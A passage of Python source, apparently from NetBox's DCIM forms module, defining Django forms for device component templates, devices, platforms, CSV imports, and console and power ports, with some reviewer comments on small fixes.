        # NOTE(review): raises DeviceType.DoesNotExist if neither initial nor submitted
        # data carries a device_type PK — assumed to always be present; confirm callers.
        device_type = DeviceType.objects.get(
            pk=self.initial.get('device_type') or self.data.get('device_type')
        )
        # Determine which rear port positions are occupied. These will be excluded from the list of available mappings.
        occupied_port_positions = [
            (front_port.rear_port_id, front_port.rear_port_position)
            for front_port in device_type.frontporttemplates.all()
        ]
        # Populate rear port choices: one "pk:position" entry per free position
        choices = []
        rear_ports = RearPortTemplate.objects.filter(device_type=device_type)
        for rear_port in rear_ports:
            for i in range(1, rear_port.positions + 1):
                if (rear_port.pk, i) not in occupied_port_positions:
                    choices.append(
                        ('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
                    )
        self.fields['rear_port_set'].choices = choices
    def clean(self):
        super().clean()
        # Validate that the number of ports being created equals the number of selected (rear port, position) tuples
        front_port_count = len(self.cleaned_data['name_pattern'])
        rear_port_count = len(self.cleaned_data['rear_port_set'])
        if front_port_count != rear_port_count:
            raise forms.ValidationError({
                'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
                                 'were selected. These counts must match.'.format(front_port_count, rear_port_count)
            })
    def get_iterative_data(self, iteration):
        # Assign rear port and position from selected set ("pk:position" strings)
        rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
        return {
            'rear_port': int(rear_port),
            'rear_port_position': int(position),
        }
class FrontPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for FrontPortTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=FrontPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('description',)
class RearPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single RearPortTemplate. The parent device_type is fixed
    and rendered as a hidden input.
    """
    class Meta:
        model = RearPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'positions', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class RearPortTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for RearPortTemplate objects.
    """
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    positions = forms.IntegerField(
        min_value=REARPORT_POSITIONS_MIN,
        max_value=REARPORT_POSITIONS_MAX,
        initial=1,
        help_text='The number of front ports which may be mapped to each rear port'
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'positions', 'description')
class RearPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for RearPortTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=RearPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('description',)
class DeviceBayTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single DeviceBayTemplate. The parent device_type is fixed
    and rendered as a hidden input.
    """
    class Meta:
        model = DeviceBayTemplate
        fields = [
            'device_type', 'name', 'label', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class DeviceBayTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for DeviceBayTemplate objects (no type field; bays only
    carry a name/label/description).
    """
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'description')
class DeviceBayTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for DeviceBayTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceBayTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'description')
#
# Component template import forms
#
class ComponentTemplateImportForm(BootstrapMixin, forms.ModelForm):
    """
    Base form for importing device component templates. The parent DeviceType
    must be passed on initialization and is forced into the form data;
    clean_device_type() then scopes any component-referencing fields to it.
    """
    def __init__(self, device_type, data=None, *args, **kwargs):
        # Must pass the parent DeviceType on form initialization.
        # Fix: guard against data=None (the declared default) which previously
        # raised AttributeError on data.update().
        if data is None:
            data = {}
        data.update({
            'device_type': device_type.pk,
        })
        super().__init__(data, *args, **kwargs)
    def clean_device_type(self):
        data = self.cleaned_data['device_type']
        # Limit fields referencing other components (e.g. power_port, rear_port)
        # to those belonging to the parent DeviceType
        for field_name, field in self.fields.items():
            if isinstance(field, forms.ModelChoiceField) and field_name != 'device_type':
                field.queryset = field.queryset.filter(device_type=data)
        return data
class ConsolePortTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for ConsolePortTemplate objects.
    """
    class Meta:
        model = ConsolePortTemplate
        fields = [
            'device_type', 'name', 'label', 'type',
        ]
class ConsoleServerPortTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for ConsoleServerPortTemplate objects.
    """
    class Meta:
        model = ConsoleServerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type',
        ]
class PowerPortTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for PowerPortTemplate objects.
    """
    class Meta:
        model = PowerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw',
        ]
class PowerOutletTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for PowerOutletTemplate objects. The power_port reference is
    resolved by name and scoped to the parent DeviceType by the base class.
    """
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        to_field_name='name',
        required=False
    )
    class Meta:
        model = PowerOutletTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg',
        ]
class InterfaceTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for InterfaceTemplate objects.
    """
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices.CHOICES
    )
    class Meta:
        model = InterfaceTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'mgmt_only',
        ]
class FrontPortTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for FrontPortTemplate objects. The rear_port reference is
    resolved by name and scoped to the parent DeviceType by the base class.
    """
    type = forms.ChoiceField(
        choices=PortTypeChoices.CHOICES
    )
    rear_port = forms.ModelChoiceField(
        queryset=RearPortTemplate.objects.all(),
        to_field_name='name',
        required=False
    )
    class Meta:
        model = FrontPortTemplate
        fields = [
            'device_type', 'name', 'type', 'rear_port', 'rear_port_position',
        ]
class RearPortTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for RearPortTemplate objects.
    """
    type = forms.ChoiceField(
        choices=PortTypeChoices.CHOICES
    )
    class Meta:
        model = RearPortTemplate
        fields = [
            'device_type', 'name', 'type', 'positions',
        ]
class DeviceBayTemplateImportForm(ComponentTemplateImportForm):
    """
    Import form for DeviceBayTemplate objects.
    """
    class Meta:
        model = DeviceBayTemplate
        fields = [
            'device_type', 'name',
        ]
#
# Device roles
#
class DeviceRoleForm(BootstrapMixin, forms.ModelForm):
    """
    Create/edit form for DeviceRole objects.
    """
    slug = SlugField()
    class Meta:
        model = DeviceRole
        fields = [
            'name', 'slug', 'color', 'vm_role', 'description',
        ]
class DeviceRoleCSVForm(CSVModelForm):
    """
    CSV bulk-import form for DeviceRole objects.
    """
    slug = SlugField()
    class Meta:
        model = DeviceRole
        fields = DeviceRole.csv_headers
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }
#
# Platforms
#
class PlatformForm(BootstrapMixin, forms.ModelForm):
    """
    Create/edit form for Platform objects.
    """
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    slug = SlugField(
        max_length=64
    )
    class Meta:
        model = Platform
        fields = [
            'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description',
        ]
        widgets = {
            'napalm_args': SmallTextarea(),
        }
class PlatformCSVForm(CSVModelForm):
    """
    CSV bulk-import form for Platform objects. The manufacturer is resolved by
    name rather than PK.
    """
    slug = SlugField()
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Limit platform assignments to this manufacturer'
    )
    class Meta:
        model = Platform
        fields = Platform.csv_headers
#
# Devices
#
class DeviceForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """
    Create/edit form for Device objects.

    Region, rack_group, manufacturer, and cluster_group act as chained
    convenience selectors (narrowing site/rack/device_type/cluster choices);
    they are not stored on the device. __init__ additionally builds the
    primary-IP choice lists for existing devices and locks site/rack for child
    devices installed in a parent's device bay.
    """
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site'
        },
        initial_params={
            'racks': '$rack'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'group_id': '$rack_group',
        }
    )
    position = forms.IntegerField(
        required=False,
        help_text="The lowest-numbered unit occupied by the device",
        widget=APISelect(
            api_url='/api/dcim/racks/{{rack}}/elevation/',
            attrs={
                'disabled-indicator': 'device',
                'data-query-param-face': "[\"$face\"]",
            }
        )
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        initial_params={
            'device_types': '$device_type'
        }
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    device_role = DynamicModelChoiceField(
        queryset=DeviceRole.objects.all()
    )
    platform = DynamicModelChoiceField(
        queryset=Platform.objects.all(),
        required=False,
        query_params={
            'manufacturer_id': ['$manufacturer', 'null']
        }
    )
    cluster_group = DynamicModelChoiceField(
        queryset=ClusterGroup.objects.all(),
        required=False,
        null_option='None',
        initial_params={
            'clusters': '$cluster'
        }
    )
    cluster = DynamicModelChoiceField(
        queryset=Cluster.objects.all(),
        required=False,
        query_params={
            'group_id': '$cluster_group'
        }
    )
    comments = CommentField()
    local_context_data = JSONField(
        required=False,
        label=''
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Device
        fields = [
            'name', 'device_role', 'device_type', 'serial', 'asset_tag', 'site', 'rack', 'position', 'face',
            'status', 'platform', 'primary_ip4', 'primary_ip6', 'cluster_group', 'cluster', 'tenant_group', 'tenant',
            'comments', 'tags', 'local_context_data'
        ]
        help_texts = {
            'device_role': "The function this device serves",
            'serial': "Chassis serial number",
            'local_context_data': "Local config context data overwrites all source contexts in the final rendered "
                                  "config context",
        }
        widgets = {
            'face': StaticSelect2(),
            'status': StaticSelect2(),
            'primary_ip4': StaticSelect2(),
            'primary_ip6': StaticSelect2(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.instance.pk:
            # Compile list of choices for primary IPv4 and IPv6 addresses
            for family in [4, 6]:
                ip_choices = [(None, '---------')]
                # Gather PKs of all interfaces belonging to this Device or a peer VirtualChassis member
                interface_ids = self.instance.vc_interfaces.values_list('pk', flat=True)
                # Collect interface IPs
                interface_ips = IPAddress.objects.filter(
                    address__family=family,
                    assigned_object_type=ContentType.objects.get_for_model(Interface),
                    assigned_object_id__in=interface_ids
                ).prefetch_related('assigned_object')
                if interface_ips:
                    ip_list = [(ip.id, f'{ip.address} ({ip.assigned_object})') for ip in interface_ips]
                    ip_choices.append(('Interface IPs', ip_list))
                # Collect NAT IPs (outside addresses whose inside address sits on one of our interfaces)
                nat_ips = IPAddress.objects.prefetch_related('nat_inside').filter(
                    address__family=family,
                    nat_inside__assigned_object_type=ContentType.objects.get_for_model(Interface),
                    nat_inside__assigned_object_id__in=interface_ids
                ).prefetch_related('assigned_object')
                if nat_ips:
                    ip_list = [(ip.id, f'{ip.address} (NAT)') for ip in nat_ips]
                    ip_choices.append(('NAT IPs', ip_list))
                self.fields['primary_ip{}'.format(family)].choices = ip_choices
            # If editing an existing device, exclude it from the list of occupied rack units. This ensures that a device
            # can be flipped from one face to another.
            self.fields['position'].widget.add_query_param('exclude', self.instance.pk)
            # Limit platform by manufacturer
            self.fields['platform'].queryset = Platform.objects.filter(
                Q(manufacturer__isnull=True) | Q(manufacturer=self.instance.device_type.manufacturer)
            )
            # Disable rack assignment if this is a child device installed in a parent device
            if self.instance.device_type.is_child_device and hasattr(self.instance, 'parent_bay'):
                self.fields['site'].disabled = True
                self.fields['rack'].disabled = True
                self.initial['site'] = self.instance.parent_bay.device.site_id
                self.initial['rack'] = self.instance.parent_bay.device.rack_id
        else:
            # An object that doesn't exist yet can't have any IPs assigned to it
            self.fields['primary_ip4'].choices = []
            self.fields['primary_ip4'].widget.attrs['readonly'] = True
            self.fields['primary_ip6'].choices = []
            self.fields['primary_ip6'].widget.attrs['readonly'] = True
        # Rack position: seed the widget with the current/submitted value so it renders
        position = self.data.get('position') or self.initial.get('position')
        if position:
            self.fields['position'].widget.choices = [(position, f'U{position}')]
class BaseDeviceCSVForm(CustomFieldModelCSVForm):
    """
    Common fields for CSV bulk-import of Device objects; subclassed by
    DeviceCSVForm (racked devices) and ChildDeviceCSVForm (bay-mounted
    children). When bound, device_type choices are narrowed to the named
    manufacturer so model-name lookups are unambiguous.
    """
    device_role = CSVModelChoiceField(
        queryset=DeviceRole.objects.all(),
        to_field_name='name',
        help_text='Assigned role'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name',
        help_text='Device type manufacturer'
    )
    device_type = CSVModelChoiceField(
        queryset=DeviceType.objects.all(),
        to_field_name='model',
        help_text='Device type model'
    )
    platform = CSVModelChoiceField(
        queryset=Platform.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned platform'
    )
    status = CSVChoiceField(
        choices=DeviceStatusChoices,
        help_text='Operational status'
    )
    cluster = CSVModelChoiceField(
        queryset=Cluster.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Virtualization cluster'
    )
    class Meta:
        fields = []
        model = Device
    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit device type queryset by manufacturer.
            # Fix: use single quotes for the subscript inside the f-string; reusing the
            # outer double quotes is a SyntaxError on Python < 3.12 (PEP 701).
            params = {f"manufacturer__{self.fields['manufacturer'].to_field_name}": data.get('manufacturer')}
            self.fields['device_type'].queryset = self.fields['device_type'].queryset.filter(**params)
class DeviceCSVForm(BaseDeviceCSVForm):
    """
    CSV bulk-import form for racked (non-child) Device objects. When bound,
    the rack_group and rack querysets are narrowed to the named site/group so
    name-based lookups are unambiguous.
    """
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Assigned rack"
    )
    face = CSVChoiceField(
        choices=DeviceFaceChoices,
        required=False,
        help_text='Mounted rack face'
    )
    class Meta(BaseDeviceCSVForm.Meta):
        fields = [
            'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
            'site', 'rack_group', 'rack', 'position', 'face', 'cluster', 'comments',
        ]
    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit rack_group queryset by assigned site.
            # Fix: use single quotes for the subscript inside the f-string; reusing the
            # outer double quotes is a SyntaxError on Python < 3.12 (PEP 701).
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
            # Limit rack queryset by assigned site and group
            params = {
                f"site__{self.fields['site'].to_field_name}": data.get('site'),
                f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
            }
            self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class ChildDeviceCSVForm(BaseDeviceCSVForm):
    """
    CSV bulk-import form for child Device objects installed in a parent
    device's bay. clean() wires up the parent_bay relationship and inherits
    site/rack from the parent.
    """
    parent = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Parent device'
    )
    device_bay = CSVModelChoiceField(
        queryset=DeviceBay.objects.all(),
        to_field_name='name',
        help_text='Device bay in which this device is installed'
    )
    class Meta(BaseDeviceCSVForm.Meta):
        fields = [
            'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
            'parent', 'device_bay', 'cluster', 'comments',
        ]
    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit device bay queryset by parent device.
            # Fix: use single quotes for the subscript inside the f-string; reusing the
            # outer double quotes is a SyntaxError on Python < 3.12 (PEP 701).
            params = {f"device__{self.fields['parent'].to_field_name}": data.get('parent')}
            self.fields['device_bay'].queryset = self.fields['device_bay'].queryset.filter(**params)
    def clean(self):
        super().clean()
        # Set parent_bay reverse relationship
        device_bay = self.cleaned_data.get('device_bay')
        if device_bay:
            self.instance.parent_bay = device_bay
        # Inherit site and rack from parent device
        parent = self.cleaned_data.get('parent')
        if parent:
            self.instance.site = parent.site
            self.instance.rack = parent.rack
class DeviceBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form applied to a selection of Devices (chosen via hidden ``pk``)."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    # Manufacturer is only used to scope the device_type choices below.
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    device_role = DynamicModelChoiceField(
        queryset=DeviceRole.objects.all(),
        required=False
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    platform = DynamicModelChoiceField(
        queryset=Platform.objects.all(),
        required=False
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(DeviceStatusChoices),
        required=False,
        widget=StaticSelect2()
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
        label='Serial Number'
    )

    class Meta:
        # Fields which may be blanked out in bulk when left empty and "nullify" is checked.
        nullable_fields = [
            'tenant', 'platform', 'serial',
        ]
class DeviceFilterForm(BootstrapMixin, LocalConfigContextFilterForm, TenancyFilterForm, CustomFieldFilterForm):
    """Filter form for the Device list view; fields map to DeviceFilterSet lookups."""
    model = Device
    # Explicit rendering order for the leading filters; remaining fields follow.
    field_order = [
        'q', 'region', 'site', 'rack_group_id', 'rack_id', 'status', 'role', 'tenant_group', 'tenant',
        'manufacturer_id', 'device_type_id', 'mac_address', 'has_primary_ip',
    ]
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    # Site choices are narrowed by the selected region(s).
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    rack_group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group',
        query_params={
            'site': '$site'
        }
    )
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site',
            'group_id': '$rack_group_id',
        }
    )
    role = DynamicModelMultipleChoiceField(
        queryset=DeviceRole.objects.all(),
        to_field_name='slug',
        required=False
    )
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False,
        label='Manufacturer'
    )
    device_type_id = DynamicModelMultipleChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        label='Model',
        display_field='model',
        query_params={
            'manufacturer': '$manufacturer'
        }
    )
    platform = DynamicModelMultipleChoiceField(
        queryset=Platform.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    status = forms.MultipleChoiceField(
        choices=DeviceStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC address'
    )
    # Tri-state (yes/no/any) boolean filters below use NullBooleanField so
    # leaving them blank applies no filtering at all.
    has_primary_ip = forms.NullBooleanField(
        required=False,
        label='Has a primary IP',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    virtual_chassis_member = forms.NullBooleanField(
        required=False,
        label='Virtual chassis member',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    console_ports = forms.NullBooleanField(
        required=False,
        label='Has console ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    console_server_ports = forms.NullBooleanField(
        required=False,
        label='Has console server ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_ports = forms.NullBooleanField(
        required=False,
        label='Has power ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_outlets = forms.NullBooleanField(
        required=False,
        label='Has power outlets',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    interfaces = forms.NullBooleanField(
        required=False,
        label='Has interfaces',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    pass_through_ports = forms.NullBooleanField(
        required=False,
        label='Has pass-through ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Device components
#
class ComponentCreateForm(ComponentForm):
    """
    Base form for the creation of device components (models subclassed from ComponentModel).
    """
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name'
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
class DeviceBulkAddComponentForm(ComponentForm):
    """Base form for adding a component to each of several selected Devices at once."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
#
# Console ports
#
class ConsolePortFilterForm(DeviceComponentFilterForm):
    """Filter form for the ConsolePort list view."""
    model = ConsolePort
    type = forms.MultipleChoiceField(
        choices=ConsolePortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class ConsolePortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single ConsolePort; parent device is fixed via hidden input."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = ConsolePort
        fields = [
            'device', 'name', 'label', 'type', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }
class ConsolePortCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk ConsolePort creation."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkCreateForm(
    form_from_model(ConsolePort, ['type']),
    DeviceBulkAddComponentForm
):
    """Add console ports to multiple selected devices; ``type`` is lifted from the model."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkEditForm(
    form_from_model(ConsolePort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for ConsolePorts selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsolePort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class ConsolePortCSVForm(CSVModelForm):
    """CSV import form for ConsolePorts; parent device is matched by name."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = ConsolePort
        fields = ConsolePort.csv_headers
#
# Console server ports
#
class ConsoleServerPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the ConsoleServerPort list view."""
    model = ConsoleServerPort
    type = forms.MultipleChoiceField(
        choices=ConsolePortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class ConsoleServerPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single ConsoleServerPort; parent device is fixed via hidden input."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = ConsoleServerPort
        fields = [
            'device', 'name', 'label', 'type', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }
class ConsoleServerPortCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk ConsoleServerPort creation."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkCreateForm(
    form_from_model(ConsoleServerPort, ['type']),
    DeviceBulkAddComponentForm
):
    """Add console server ports to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkEditForm(
    form_from_model(ConsoleServerPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for ConsoleServerPorts selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsoleServerPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class ConsoleServerPortCSVForm(CSVModelForm):
    """CSV import form for ConsoleServerPorts; parent device is matched by name."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = ConsoleServerPort
        fields = ConsoleServerPort.csv_headers
#
# Power ports
#
class PowerPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the PowerPort list view."""
    model = PowerPort
    type = forms.MultipleChoiceField(
        choices=PowerPortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class PowerPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single PowerPort; parent device is fixed via hidden input."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerPort
        fields = [
            'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }
class PowerPortCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk PowerPort creation."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum draw in watts"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated draw in watts"
    )
    field_order = (
        'device', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
    )
class PowerPortBulkCreateForm(
    form_from_model(PowerPort, ['type', 'maximum_draw', 'allocated_draw']),
    DeviceBulkAddComponentForm
):
    """Add power ports to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags')
class PowerPortBulkEditForm(
    form_from_model(PowerPort, ['label', 'type', 'maximum_draw', 'allocated_draw', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for PowerPorts selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class PowerPortCSVForm(CSVModelForm):
    """CSV import form for PowerPorts; parent device is matched by name."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = PowerPort
        fields = PowerPort.csv_headers
#
# Power outlets
#
class PowerOutletFilterForm(DeviceComponentFilterForm):
    """Filter form for the PowerOutlet list view."""
    model = PowerOutlet
    type = forms.MultipleChoiceField(
        choices=PowerOutletTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class PowerOutletForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single PowerOutlet; the feeding power port must be local."""
    power_port = forms.ModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False
    )
